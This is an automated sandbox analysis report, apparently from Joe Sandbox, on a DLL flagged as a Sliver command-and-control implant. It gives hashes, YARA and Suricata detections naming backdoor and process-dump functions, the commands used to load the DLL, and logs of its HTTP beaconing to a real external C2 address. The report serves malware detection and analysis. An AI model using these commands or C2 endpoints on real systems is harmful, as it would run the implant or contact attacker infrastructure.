Windows Analysis Report
5cPRapVOx6.dll

Overview

General Information

Sample name: 5cPRapVOx6.dll (renamed because the original name is a hash value)
Original sample name: c994bb9982dd689598c6c261090a40cb.dll
Analysis ID: 1520451
MD5: c994bb9982dd689598c6c261090a40cb
SHA1: 484932042beb27bec5ab6d96df21ec1418c428a6
SHA256: fbce9fc010fdfb67da5ff95cc5a5d1dbb0c07950522f130b031e55831f81b060
Tags: dll, user-abuse_ch

Detection

Sliver
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Sliver Implants
AI detected suspicious sample
Found Tor onion address
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential time zone aware malware
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • loaddll32.exe (PID: 7336 cmdline: loaddll32.exe "C:\Users\user\Desktop\5cPRapVOx6.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7456 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5cPRapVOx6.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7480 cmdline: rundll32.exe "C:\Users\user\Desktop\5cPRapVOx6.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • regsvr32.exe (PID: 7472 cmdline: regsvr32.exe /i /s C:\Users\user\Desktop\5cPRapVOx6.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
    • rundll32.exe (PID: 7488 cmdline: rundll32.exe C:\Users\user\Desktop\5cPRapVOx6.dll,DllInstall MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7624 cmdline: rundll32.exe C:\Users\user\Desktop\5cPRapVOx6.dll,DllRegisterServer MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7664 cmdline: rundll32.exe C:\Users\user\Desktop\5cPRapVOx6.dll,DllUnregisterServer MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
Name: Sliver
Description: According to VK9 Security, Sliver is a Command and Control (C2) system made for penetration testers, red teams, and advanced persistent threats. It generates implants (slivers) that can run on virtually every architecture out there, and securely manage these connections through a central server. Sliver supports multiple callback protocols including DNS, TCP, and HTTP(S) to make egress simple, even when those pesky blue teams block your domains. You can even have multiple operators (players) simultaneously commanding your sliver army.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.sliver
No configs have been found
Source | Rule | Description | Author | Strings
5cPRapVOx6.dll | Multi_Trojan_Bishopsliver_42298c4a | unknown | unknown
  • 0xc7c29e:$a1: ).RequestResend
  • 0xc6b376:$a2: ).GetPrivInfo
5cPRapVOx6.dll | INDICATOR_TOOL_Sliver | Detects Sliver implant cross-platform adversary emulation/red team | ditekSHen
  • 0xa3755e:$s3: .WGTCPForwarder
  • 0xa382e0:$s3: .WGTCPForwarder
  • 0xa390cc:$s3: .WGTCPForwarder
  • 0xa3a185:$s3: .WGTCPForwarder
  • 0xa607ac:$s3: .WGTCPForwarder
  • 0xa618c0:$s3: .WGTCPForwarder
  • 0xa341d0:$s6: .BackdoorReq
  • 0xa374b0:$s7: .ProcessDumpReq
  • 0xa39789:$s8: .InvokeSpawnDllReq
  • 0xa30664:$s9: .SpawnDll
  • 0xa34322:$s9: .SpawnDll
Source | Rule | Description | Author | Strings
00000007.00000003.3672650809.000000000C95C000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Sliver | Yara detected Sliver Implants | Joe Security
00000004.00000002.4218098729.000000000CD74000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Sliver | Yara detected Sliver Implants | Joe Security
00000007.00000002.4220285645.000000000C95C000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Sliver | Yara detected Sliver Implants | Joe Security
00000004.00000003.3996852512.000000000CD74000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Sliver | Yara detected Sliver Implants | Joe Security
00000005.00000002.4218005900.000000000CCCA000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Sliver | Yara detected Sliver Implants | Joe Security
Source | Rule | Description | Author | Strings
6.2.rundll32.exe.6be00000.0.unpack | Multi_Trojan_Bishopsliver_42298c4a | unknown | unknown
  • 0xc7c29e:$a1: ).RequestResend
  • 0xc6b376:$a2: ).GetPrivInfo
6.2.rundll32.exe.6be00000.0.unpack | INDICATOR_TOOL_Sliver | Detects Sliver implant cross-platform adversary emulation/red team | ditekSHen
  • 0xa3755e:$s3: .WGTCPForwarder
  • 0xa382e0:$s3: .WGTCPForwarder
  • 0xa390cc:$s3: .WGTCPForwarder
  • 0xa3a185:$s3: .WGTCPForwarder
  • 0xa607ac:$s3: .WGTCPForwarder
  • 0xa618c0:$s3: .WGTCPForwarder
  • 0xa341d0:$s6: .BackdoorReq
  • 0xa374b0:$s7: .ProcessDumpReq
  • 0xa39789:$s8: .InvokeSpawnDllReq
  • 0xa30664:$s9: .SpawnDll
  • 0xa34322:$s9: .SpawnDll
7.2.rundll32.exe.6be00000.0.unpack | Multi_Trojan_Bishopsliver_42298c4a | unknown | unknown
  • 0xc7c29e:$a1: ).RequestResend
  • 0xc6b376:$a2: ).GetPrivInfo
7.2.rundll32.exe.6be00000.0.unpack | INDICATOR_TOOL_Sliver | Detects Sliver implant cross-platform adversary emulation/red team | ditekSHen
  • 0xa3755e:$s3: .WGTCPForwarder
  • 0xa382e0:$s3: .WGTCPForwarder
  • 0xa390cc:$s3: .WGTCPForwarder
  • 0xa3a185:$s3: .WGTCPForwarder
  • 0xa607ac:$s3: .WGTCPForwarder
  • 0xa618c0:$s3: .WGTCPForwarder
  • 0xa341d0:$s6: .BackdoorReq
  • 0xa374b0:$s7: .ProcessDumpReq
  • 0xa39789:$s8: .InvokeSpawnDllReq
  • 0xa30664:$s9: .SpawnDll
  • 0xa34322:$s9: .SpawnDll
5.2.rundll32.exe.6be00000.0.unpack | Multi_Trojan_Bishopsliver_42298c4a | unknown | unknown
  • 0xc7c29e:$a1: ).RequestResend
  • 0xc6b376:$a2: ).GetPrivInfo

System Summary

Source: Network Connection | Author: Dmitriy Lifanov, oscd.community | Data: DestinationIp: 203.204.217.190, DestinationIsIpv6: false, DestinationPort: 8082, EventID: 3, Image: C:\Windows\SysWOW64\regsvr32.exe, Initiated: true, ProcessId: 7472, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49732

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-27T11:20:30.598642+0200 | 2852655 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49746 | 203.204.217.190 | 8092 | TCP
2024-09-27T11:20:30.688055+0200 | 2852655 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49747 | 203.204.217.190 | 8092 | TCP
2024-09-27T11:20:36.250198+0200 | 2852655 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49752 | 203.204.217.190 | 8092 | TCP
2024-09-27T11:22:43.596272+0200 | 2852655 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49772 | 203.204.217.190 | 8092 | TCP

AV Detection

Source: 5cPRapVOx6.dll | ReversingLabs: Detection: 50%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.1% probability
Source: 5cPRapVOx6.dll | Joe Sandbox ML: detected
Source: 5cPRapVOx6.dll | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
Source: 5cPRapVOx6.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

Source: Network traffic | Suricata IDS: 2852655 - Severity 1 - ETPRO MALWARE Sliver HTTP SessionInit Request : 192.168.2.4:49747 -> 203.204.217.190:8092
Source: Network traffic | Suricata IDS: 2852652 - Severity 1 - ETPRO MALWARE Sliver HTTP SessionInit Request : 192.168.2.4:49770 -> 203.204.217.190:8092
Source: Network traffic | Suricata IDS: 2852658 - Severity 1 - ETPRO MALWARE Sliver HTTP SessionInit Request : 192.168.2.4:49768 -> 203.204.217.190:8092
Source: Network traffic | Suricata IDS: 2852654 - Severity 1 - ETPRO MALWARE Sliver HTTP SessionInit Request : 192.168.2.4:49754 -> 203.204.217.190:8092
Source: Network traffic | Suricata IDS: 2852655 - Severity 1 - ETPRO MALWARE Sliver HTTP SessionInit Request : 192.168.2.4:49746 -> 203.204.217.190:8092
Source: Network traffic | Suricata IDS: 2852657 - Severity 1 - ETPRO MALWARE Sliver HTTP SessionInit Request : 192.168.2.4:49764 -> 203.204.217.190:8092
Source: Network traffic | Suricata IDS: 2852655 - Severity 1 - ETPRO MALWARE Sliver HTTP SessionInit Request : 192.168.2.4:49752 -> 203.204.217.190:8092
Source: Network traffic | Suricata IDS: 2852653 - Severity 1 - ETPRO MALWARE Sliver HTTP SessionInit Request : 192.168.2.4:49748 -> 203.204.217.190:8092
Source: Network traffic | Suricata IDS: 2852658 - Severity 1 - ETPRO MALWARE Sliver HTTP SessionInit Request : 192.168.2.4:49750 -> 203.204.217.190:8092
Source: Network traffic | Suricata IDS: 2852653 - Severity 1 - ETPRO MALWARE Sliver HTTP SessionInit Request : 192.168.2.4:49763 -> 203.204.217.190:8092
Source: Network traffic | Suricata IDS: 2852653 - Severity 1 - ETPRO MALWARE Sliver HTTP SessionInit Request : 192.168.2.4:49767 -> 203.204.217.190:8092
Source: Network traffic | Suricata IDS: 2852655 - Severity 1 - ETPRO MALWARE Sliver HTTP SessionInit Request : 192.168.2.4:49772 -> 203.204.217.190:8092
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 203.204.217.190 8092
            Source: unknown Network traffic detected: HTTP traffic on port 8092 -> 49743
            Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 8092
            Source: unknown Network traffic detected: HTTP traffic on port 8092 -> 49745
            Source: unknown Network traffic detected: HTTP traffic on port 8092 -> 49744
            Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 8092
            Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 8092
            Source: unknown Network traffic detected: HTTP traffic on port 8092 -> 49746
            Source: unknown Network traffic detected: HTTP traffic on port 8092 -> 49747
            Source: unknown Network traffic detected: HTTP traffic on port 8092 -> 49748
            Source: unknown Network traffic detected: HTTP traffic on port 8092 -> 49749
            Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 8092
            Source: unknown Network traffic detected: HTTP traffic on port 8092 -> 49750
            Source: unknown Network traffic detected: HTTP traffic on port 8092 -> 49751
            Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 8092
            Source: unknown Network traffic detected: HTTP traffic on port 8092 -> 49752
            Source: unknown Network traffic detected: HTTP traffic on port 8092 -> 49753
            Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 8092
            Source: unknown Network traffic detected: HTTP traffic on port 8092 -> 49754
            Source: unknown Network traffic detected: HTTP traffic on port 8092 -> 49761
            Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 8092
            Source: unknown Network traffic detected: HTTP traffic on port 8092 -> 49762
            Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 8092
            Source: unknown Network traffic detected: HTTP traffic on port 8092 -> 49763
            Source: unknown Network traffic detected: HTTP traffic on port 8092 -> 49764
            Source: unknown Network traffic detected: HTTP traffic on port 8092 -> 49765
            Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 8092
            Source: unknown Network traffic detected: HTTP traffic on port 8092 -> 49767
            Source: unknown Network traffic detected: HTTP traffic on port 8092 -> 49766
            Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 8092
            Source: unknown Network traffic detected: HTTP traffic on port 8092 -> 49768
            Source: unknown Network traffic detected: HTTP traffic on port 8092 -> 49769
            Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 8092
            Source: unknown Network traffic detected: HTTP traffic on port 8092 -> 49770
            Source: unknown Network traffic detected: HTTP traffic on port 8092 -> 49771
            Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 8092
            Source: unknown Network traffic detected: HTTP traffic on port 8092 -> 49772
            Source: global traffic TCP traffic: 192.168.2.4:49730 -> 203.204.217.190:8082
            Source: Joe Sandbox View ASN Name: MULTIMEDIA-AS-APHoshinMultimediaCenterIncTW
            Source: global traffic HTTP traffic detected: POST /rpc.html?o=7v7059308&sc=67086726 HTTP/1.1 Host: 203.204.217.190:8092 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36 Content-Length: 1209 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip
            Source: global traffic HTTP traffic detected: POST /oauth/oauth2/oauth2/api/oauth/php/oauth2callback/rpc.html?j=667332t1t6&yi=670f86726 HTTP/1.1 Host: 203.204.217.190:8092 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36 Content-Length: 532 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip
            Source: global traffic HTTP traffic detected: POST /namespaces/db/oauth2callback/oauth2callback/db/api.html?c=68572884&oo=6708672y6 HTTP/1.1 Host: 203.204.217.190:8092 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36 Content-Length: 1196 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip
            Source: global traffic HTTP traffic detected: POST /namespaces/oauth/sign-up.html?dr=18845628&k=7303s814h1 HTTP/1.1 Host: 203.204.217.190:8092 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36 Content-Length: 532 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip
            Source: global traffic HTTP traffic detected: POST /db/oauth/db/oauth2/php/db/oauth2callback/rpc.html?h=75352k715&wh=18f84w5628 HTTP/1.1 Host: 203.204.217.190:8092 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36 Content-Length: 294 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip
            Source: global traffic HTTP traffic detected: POST /oauth2/database/api/php/samples.html?d=71155844&og=18845628 HTTP/1.1 Host: 203.204.217.190:8092 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36 Content-Length: 2538 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip
            Source: global traffic HTTP traffic detected: POST /db/api.html?x=19440630&xj=33556174 HTTP/1.1 Host: 203.204.217.190:8092 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36 Content-Length: 294 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip
            Source: global traffic HTTP traffic detected: POST /oauth/database/namespaces/database/api/db/database/register.html?c=21322866&wd=a33556174 HTTP/1.1 Host: 203.204.217.190:8092 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36 Content-Length: 294 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip
            Source: global traffic HTTP traffic detected: POST /oauth2/oauth/db/api.html?_=36462oo14&ip=33556174 HTTP/1.1 Host: 203.204.217.190:8092 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36 Content-Length: 355 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip
            Source: global traffic HTTP traffic detected: POST /oauth/api/php/db/sign-up.html?_u=3355617q4&u=4866k2066 HTTP/1.1 Host: 203.204.217.190:8092 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36 Content-Length: 392 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip
            Source: global traffic HTTP traffic detected: POST /db/namespaces/signin.html?rp=33556174&w=6871591h9 HTTP/1.1 Host: 203.204.217.190:8092 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36 Content-Length: 392 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip
            Source: global traffic HTTP traffic detected: POST /database/namespaces/oauth2/oauth/database/rpc.html?bs=3q3556174&n=5l3348718 HTTP/1.1 Host: 203.204.217.190:8092 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36 Content-Length: 355 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip
            Source: unknown TCP traffic detected without corresponding DNS query: 203.204.217.190
Source: unknown HTTP traffic detected: POST /rpc.html?o=7v7059308&sc=67086726 HTTP/1.1 Host: 203.204.217.190:8092 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.2012.125 Safari/537.36 Content-Length: 1209 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip Data Raw: [gzip-compressed request body, 1209 bytes; hex dump omitted]
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 09:20:30 GMT Content-Length: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 09:20:30 GMT Content-Length: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 09:20:30 GMT Content-Length: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 09:20:33 GMT Content-Length: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 09:20:36 GMT Content-Length: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 09:20:39 GMT Content-Length: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 09:22:34 GMT Content-Length: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 09:22:34 GMT Content-Length: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 09:22:36 GMT Content-Length: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 09:22:37 GMT Content-Length: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 09:22:41 GMT Content-Length: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 09:22:43 GMT Content-Length: 0
            Source: rundll32.exe, 00000008.00000002.4224327410.000000000CDF0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000003.2661833618.000000000CE28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092
            Source: rundll32.exe, 00000008.00000002.4210435396.000000000064A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/
            Source: regsvr32.exe, 00000004.00000002.4209945473.0000000000B1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/4
            Source: rundll32.exe, 00000007.00000002.4210351157.000000000059A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/C9
            Source: loaddll32.exe, 00000001.00000002.4223019198.000000000A298000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/database/namespaces/oauth2/oauth/database/rpc.html
            Source: loaddll32.exe, 00000001.00000002.4223019198.000000000A298000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/database/namespaces/oauth2/oauth/database/rpc.html?
            Source: loaddll32.exe, 00000001.00000002.4212338833.000000000A022000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/database/namespaces/oauth2/oauth/database/rpc.html?bs=3q3556174&n=5l3348
            Source: loaddll32.exe, 00000001.00000002.4223019198.000000000A298000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/database/namespaces/oauth2/oauth/database/rpc.php
            Source: loaddll32.exe, 00000001.00000002.4223019198.000000000A298000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/database/namespaces/oauth2/oauth/database/rpc.phphttp://203.204.217.190:
            Source: rundll32.exe, 00000006.00000002.4212929021.000000000CC16000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/api.html
            Source: rundll32.exe, 00000006.00000002.4212929021.000000000CC16000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/api.html2006-01-02T15:04:05.999999999Z07:00
            Source: rundll32.exe, 00000006.00000002.4221390129.000000000CDDC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/api.html?x=19440630&xj=33556174
            Source: rundll32.exe, 00000006.00000002.4221390129.000000000CDDC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/api.php
            Source: rundll32.exe, 00000006.00000002.4221390129.000000000CDDC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/api.php.
            Source: rundll32.exe, 00000008.00000002.4214213422.000000000CC18000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/namespaces/signin.html
            Source: rundll32.exe, 00000008.00000002.4214213422.000000000CC18000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/namespaces/signin.html?
            Source: rundll32.exe, 00000008.00000002.4214213422.000000000CC18000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/namespaces/signin.html?H
            Source: rundll32.exe, 00000008.00000002.4214213422.000000000CC06000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/namespaces/signin.html?rp=33556174&w=6871591h9
            Source: rundll32.exe, 00000008.00000002.4214213422.000000000CC06000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/namespaces/signin.html?rp=33556174&w=6871591h9Mozilla/5.0
            Source: rundll32.exe, 00000008.00000002.4214213422.000000000CC18000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/namespaces/signin.php
            Source: rundll32.exe, 00000008.00000002.4214213422.000000000CC18000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/namespaces/signin.phphttp://203.204.217.190:8092/db/namespaces/signin
            Source: rundll32.exe, 00000008.00000003.2661683184.000000000CE46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/oauth/db/oauth2/php/db/oauth2callback/rpc.html
            Source: rundll32.exe, 00000008.00000003.2661683184.000000000CE46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/oauth/db/oauth2/php/db/oauth2callback/rpc.html?
            Source: rundll32.exe, 00000008.00000003.3673360000.000000000D094000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/oauth/db/oauth2/php/db/oauth2callback/rpc.html?h=75352k715&wh=18f84w5
            Source: rundll32.exe, 00000008.00000003.2661683184.000000000CE46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/oauth/db/oauth2/php/db/oauth2callback/rpc.php
            Source: rundll32.exe, 00000008.00000003.2661683184.000000000CE46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/db/oauth/db/oauth2/php/db/oauth2callback/rpc.phphttp://203.204.217.190:8
            Source: rundll32.exe, 00000007.00000003.3671385890.000000000C9F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/http://203.204.217.190:8092
            Source: rundll32.exe, 00000006.00000002.4210958697.000000000099A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/l
            Source: regsvr32.exe, 00000004.00000003.3996852512.000000000CD70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/namespaces/db/oauth2callback/oauth2callback/db/api.html
            Source: regsvr32.exe, 00000004.00000003.3996852512.000000000CD70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/namespaces/db/oauth2callback/oauth2callback/db/api.html?
            Source: regsvr32.exe, 00000004.00000003.3996435378.000000000CDFA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/namespaces/db/oauth2callback/oauth2callback/db/api.html?c=68572884&oo=67
            Source: regsvr32.exe, 00000004.00000003.3996852512.000000000CD70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/namespaces/db/oauth2callback/oauth2callback/db/api.php
            Source: regsvr32.exe, 00000004.00000003.3996852512.000000000CD70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/namespaces/db/oauth2callback/oauth2callback/db/api.phphttp://203.204.217
            Source: rundll32.exe, 00000007.00000003.3671523760.000000000C9DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/namespaces/oauth/sign-up.html
            Source: rundll32.exe, 00000007.00000003.3671523760.000000000C9DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/namespaces/oauth/sign-up.html?
            Source: rundll32.exe, 00000007.00000003.3672973285.000000000C902000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/namespaces/oauth/sign-up.html?dr=18845628&k=7303s814h1
            Source: rundll32.exe, 00000007.00000003.3672973285.000000000C902000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/namespaces/oauth/sign-up.html?dr=18845628&k=7303s814h1Mozilla/5.0
            Source: rundll32.exe, 00000007.00000003.3671523760.000000000C9DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/namespaces/oauth/sign-up.php
            Source: rundll32.exe, 00000007.00000003.3671523760.000000000C9DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/namespaces/oauth/sign-up.phphttp://203.204.217.190:8092/namespaces/oauth
            Source: rundll32.exe, 00000007.00000002.4214531173.000000000C88C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth/api/php/db/sign-up.html
            Source: rundll32.exe, 00000007.00000002.4214531173.000000000C88C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth/api/php/db/sign-up.html?
            Source: rundll32.exe, 00000007.00000002.4214531173.000000000C88C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth/api/php/db/sign-up.html?H
            Source: rundll32.exe, 00000007.00000003.3672973285.000000000C902000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth/api/php/db/sign-up.html?_u=3355617q4&u=4866k2066
            Source: rundll32.exe, 00000007.00000002.4214531173.000000000C88C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth/api/php/db/sign-up.php
            Source: rundll32.exe, 00000007.00000002.4214531173.000000000C88C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth/api/php/db/sign-up.phphttp://203.204.217.190:8092/oauth/api/php/db
            Source: rundll32.exe, 00000005.00000003.3835054805.000000000CD5C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth/database/namespaces/database/api/db/database/register.html
            Source: rundll32.exe, 00000005.00000003.3835054805.000000000CD5C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth/database/namespaces/database/api/db/database/register.html?
            Source: rundll32.exe, 00000005.00000003.3835054805.000000000CD5E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth/database/namespaces/database/api/db/database/register.html?c=21322
            Source: rundll32.exe, 00000005.00000003.3835054805.000000000CD5C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://203.204.217.190:8092/oauth/oauth2/oauth2/api/oauth/php/oauth2callback/rpc.html
